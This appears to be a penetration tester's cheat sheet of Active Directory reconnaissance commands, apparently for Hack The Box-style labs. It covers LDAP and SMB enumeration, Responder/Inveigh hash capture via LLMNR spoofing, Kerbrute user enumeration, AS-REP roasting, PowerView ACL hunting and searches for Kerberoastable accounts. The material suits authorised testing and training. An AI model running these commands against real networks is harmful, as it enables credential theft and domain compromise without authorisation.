Recon
# LDAP Enumeration
ldapsearch -H ldap://dc.zencorp.htb -x -s base namingcontexts
# LDAP
ldapsearch -H ldap://192.168.110.55 -x -s base -b '' "(objectClass=*)" "*"
# LDAP Domain dump
ldapdomaindump -u 'domain.tld\username' -p password -o /tmp dc-ip-address
# Find users by SID's
impacket-lookupsid guest@10.10.11.35 -no-pass
# Enum4linux
enum4linux -P 172.16.5.5
# Enumerate password policy
enum4linux-ng -P 172.16.5.5 -oA ilfreightUse LLMNR/NBT-NS Response Spoofing to capture hashes with Responder or Inveigh. Check for write access on SMB shares. A malicious .lnk or scf file can be used to target the attack host.
# Responder linux
/sudo responder -I tun0
# Inveigh in powershell
.\Inveigh.exeUser enumeration
# Kerbrute
kerbrute userenum -d ZENCORP.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175
# GetNPUsers.py
GetNPUsers.py 'ZENCORP.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175
# Rpcclient
rpcclient -U "" -N 172.16.210.5 rpcclient
$ enumdomuser
# Crackmapexec
crackmapexec smb 172.16.51.15 --users
crackmapexec smb 172.16.51.51 -u user -p password --usersPowerView enumeration
# Find interesting ACLs (privilege escalation paths)
Find-InterestingDomainAcl
# Get ACLs for specific user
$sid = Convert-NameToSid mczen
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
# Get basic user info
Get-DomainUser "username"
# Get user's group memberships
Get-DomainGroup -UserName "username"
# Get members of specific group
Get-DomainGroupMember "Domain Admins"
# Detailed ACL permissions for user
Get-DomainObjectACL -SamAccountName "username" -ResolveGUIDs
# Find privileged users (AdminCount=1)
Get-DomainUser -AdminCount
# Get domain password policy
Get-DomainPolicy
# Enumerate all users
Get-DomainUser
# Enumerate all computers
Get-DomainComputer
# Enumerate all groups
Get-DomainGroup
# Get nested group memberships
Get-DomainGroup -Identity "IT" -Properties MemberOf | Select-Object -ExpandProperty MemberOfWindapsearch
# Check for bind
python3 windapsearch.py --dc-ip 10.129.1.111 -u "" --functionality
# Get domain users
python3 windapsearch.py --dc-ip 10.129.1.207 -u "" -U
# Get domain computers
python3 windapsearch.py --dc-ip 10.129.1.207 -u "" -C
# Search for OU by user
python3 windapsearch.py --dc-ip 10.129.42.188 -u "" -s "john doe"
# Show groups
python3 windapsearch.py --dc-ip 10.129.42.188 -u "" -G
# Unconstrained delegation
python3 windapsearch.py --dc-ip 10.129.42.188 -u "" -U --unconstrained-usersLdapsearch-ad.py
# Check password policy
python3 ldapsearch-ad.py -l 10.129.1.207 -d zencorp -u john.doe -p pass123 -t pass-pols
# Check for Kerberoastable users
python3 ldapsearch-ad.py -l 10.129.1.207 -d zencorp -u john.doe -p pass123 -t kerberoast | grep servicePrincipalName
# Check ofr ASREPRoastable users
python3 ldapsearch-ad.py -l 10.129.1.207 -d zencorp -u john.doe -p pass123 -t asreproast